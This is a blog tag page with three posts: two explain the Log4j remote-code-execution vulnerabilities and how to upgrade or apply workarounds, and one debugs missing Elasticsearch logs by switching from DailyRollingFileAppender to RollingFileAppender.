Tag: log4J

  • Log4j 2.16.0 Fixes Critical Vulnerabilities: What You must know

    Apache Log4j 2.16.0 is now available

    Apache Log4j 2.16.0 Is Now Available – Critical Update Required

    A new follow-on vulnerability in Log4j has been discovered and fixed in version 2.16.0, addressing CVE-2021-44228 and CVE-2021-45046. If you’re still using version 2.15.0 or earlier, your applications may remain vulnerable in certain non-default configurations.

    This is is a follow on from my previous post: Log4J Zero-Day Exploit: Explained with Fixes.

    Here’s why this update is critical and what you need to do.

    TL;DR

    If you’re short on time, here’s the gist:

    • Upgrade your Log4j library to version 2.16.0 immediately.
    • The newer version completely removes the risky message lookup feature, which was the critical enabler of these exploits.
    • Visit the Apache Security Page for the latest updates

    Why Version 2.15.0 Isn’t Enough

    While version 2.15.0 addressed initial vulnerabilities, it left certain configurations exposed. Specifically, using the Thread Context value in the log message Pattern Layout could still allow exploitation. Version 2.16.0 eliminates this risk by fully removing the message lookup functionality.

    Misleading Fixes to Avoid

    Not all solutions floating around the community are effective. Avoid relying on the following:

    • Updating just the Java version.
    • Filtering vulnerabilities using Web Application Firewalls (WAF).
    • Modifying the log statement format to %m{nolookup}.

    These approaches won’t fully mitigate the vulnerabilities, so upgrading to version 2.16.0 is your safest bet.

    How to Stay Updated

    The Log4j exploit has drawn global attention, leading to a flood of information—some of which may be inaccurate. For reliable updates, stick to trusted sources:

    What’s Next?

    This is an evolving situation, and further updates may arise. Bookmark the Apache Security Page and regularly check for announcements to stay ahead of potential risks.

  • Log4J Zero-Day Exploit: Explained with Fixes

    Note: Check out my latest blog for updated information and solutions on this issue: Log4j 2.16.0 Fixes Critical Vulnerabilities: What You Need to Know

    The best evidence I have seen so far is that of a little bobby table LinkedIn exploit 🫣

    Overview: What Is the Log4J Zero-Day Exploit (CVE-2021-44228)?

    A critical zero-day exploit affecting the widely used Log4J library has been identified and fixed in version 2.15.0. This vulnerability (CVE-2021-44228) allows attackers to gain complete control of your server remotely—making it one of the most dangerous Java-based vulnerabilities to date.

    For details, visit the Apache Log4j Security Page. This isn’t just a Java developer’s headache—it’s a wake-up call for every engineer, security specialist, and even non-Java tech teams whose tools rely on Log4J indirectly (looking at you, Elasticsearch and Atlassian users).

    This post explains:

    1. How the exploit works.
    2. How to check if you’re affected.
    3. Step-by-step fixes to secure your applications.

    Quick Summary

    • Upgrade Log4J to version 2.15.0 or later immediately.
    • Workarounds exist for systems where upgrading isn’t feasible (see below).
    • Popular apps like Elasticsearch, Minecraft, and Jira are affected.

    Understanding the Exploit

    The vulnerability lies in log4j-core versions 2.0-beta9 to 2.14.1. When an application logs user inputs using Log4J, the exploit allows malicious actors to execute arbitrary code remotely. In practical terms, if your app takes user input and logs it, you’re at risk.

    Am I Affected?

    If your system runs Java and incorporates log4j-core, either directly or through dependencies, assume you’re affected. Use tools like Maven or Gradle to identify the versions in your project. Here’s how:

    For Gradle

    ./gradlew dependencies | grep "log4j"

    For Maven

    ./mvn dependency:tree | grep log4j

    Most Java applications log user inputs, making this a near-universal issue. Be proactive and investigate now.

    How to Fix the Log4J Vulnerability

    1. Upgrade Your Log4J Version

    The most reliable solution is upgrading to Log4J 2.15.0 or newer. Here’s how for common tools:

    Maven

    <properties>  <log4j2.version>2.15.0</log4j2.version> 
    </properties>

    Then verify the fix with

    ./mvn dependency:list | grep log4j

    Gradle

    implementation(platform("org.apache.logging.log4j:log4j-bom:2.15.0"))

    Then confirm the version fix with

    ./gradlew dependencyInsight --dependency log4j-core

    2. Workarounds If Upgrading Isn’t Feasible

    For systems running Log4J 2.10 or later, use these temporary fixes:

    Add the system property

    Dlog4j2.formatMsgNoLookups=true

    Set the environment variable

    LOG4J_FORMAT_MSG_NO_LOOKUPS=true

    For JVM-based apps, modify the launch command

    java -Dlog4j2.formatMsgNoLookups=true -jar myapplication.jar

    Applications Known to Be Affected

    Even if you’re not directly using Log4J, many popular tools and libraries depend on it. Here’s a (non-exhaustive) list of systems at risk:

    • Libraries: Spring Boot, Struts
    • Applications: Elasticsearch, Kafka, Solr, Jira, Confluence, Logstash, Minecraft
    • Servers: Steam, Apple iCloud

    If you’re using any of these, check their documentation for specific patches or updates.

    Final Reminder: Why This Matters

    Apache has rated this vulnerability as critical. Exploiting it allows remote attackers to execute arbitrary code as the server user, potentially with root access. Worm-like attacks that propagate automatically are possible.

    To stay secure:

    1. Upgrade or apply workarounds immediately.
    2. Regularly monitor the Apache Log4j Security Page for updates.

    Additional Resources

  • The Case of Missing Elasticsearch Logs: A Midnight Mystery

    The Case of Missing Elasticsearch Logs: A Midnight Mystery

    While debugging my Elasticsearch instance, I noticed a curious issue: logs would vanish consistently at midnight. No logs appeared between 23:40:00 and 00:00:05, leaving an unexplained gap. This guide walks through the debugging process, root cause identification, and a simple fix.

    Initial Investigation: Where Did the Logs Go?

    At first glance, the following possibilities seemed likely:

    1. Log Rotation: Elasticsearch rotates its logs at midnight. Could this process be causing the missing lines?
    2. Marvel Indices: Marvel creates daily indices at midnight. Could this interfere with log generation?

    Neither explained the issue upon closer inspection, so I dug deeper.

    The Real Culprit: Log4j and DailyRollingFileAppender

    The issue turned out to be related to Log4j. Elasticsearch uses Log4j for logging, but instead of a traditional log4j.properties file, it employs a translated YAML configuration. After reviewing the logging configuration, I found the culprit: DailyRollingFileAppender.

    What’s Wrong with DailyRollingFileAppender?

    The DailyRollingFileAppender class extends Log4j’s FileAppender but introduces a major flaw—it synchronizes file rolling at user-defined intervals, which can cause:

    • Data Loss: Logs might not be written during the rolling process.
    • Synchronization Issues: Overlap between log files leads to missing data.

    This behavior is well-documented in the Apache DailyRollingFileAppender documentation.

    Root Cause: Why Were Logs Missing?

    The missing logs were a direct result of using DailyRollingFileAppender, which failed to properly handle log rotation at midnight. This caused gaps in logging during the critical period when the file was being rolled over.

    The Fix: Switch to RollingFileAppender

    To resolve this, I replaced DailyRollingFileAppender with RollingFileAppender, which rolls logs based on file size rather than a specific time. This eliminates the synchronization issues associated with the daily rolling behavior.

    Updated YAML Configuration

    Here’s how I updated the configuration:

    file:
      type: rollingfile
      file: ${path.logs}/${cluster.name}.log
      maxFileSize: 100MB
      maxBackupIndex: 10
      layout:
        type: pattern
        conversionPattern: "[%d{ISO8601}][%-5p][%-25c] %m%n" 

    Key Changes:

    • Type: Changed from dailyRollingFile to rollingFile.
    • File Size Limit: Set maxFileSize to 100MB.
    • Backup: Retain up to 10 backup log files.
    • Removed Date Pattern: Eliminated the problematic datePattern field used by DailyRollingFileAppender.

    Happy Ending: Logs Restored

    After implementing the fix, Elasticsearch logs stopped disappearing. Interestingly, further investigation revealed that the midnight log gap was also related to Marvel indices transitioning into a new day. This caused brief latency as new indices were created for shards and replicas.

    Lessons Learned

    1. Understand Your Tools: Familiarity with Log4j’s appenders helped identify the issue quickly.
    2. Avoid Deprecated Features: DailyRollingFileAppender is prone to issues—switch to RollingFileAppender for modern setups.
    3. Analyze Related Systems: The Marvel index creation provided additional context for the midnight timing.

    Conclusion

    Debugging missing Elasticsearch logs required diving into the logging configuration and understanding how appenders handle file rolling. By switching to RollingFileAppender, I resolved the synchronisation issues and restored the missing logs.

    If you’re experiencing similar issues, check your logging configuration and avoid using DailyRollingFileAppender in favor of RollingFileAppender. This can save hours of debugging in the future.

    For more insights, explore Log4j Appender Documentation.

    Also, to learn how to clean data coming into Elasticsearch see Cleaning Elasticsearch Data Before Indexing.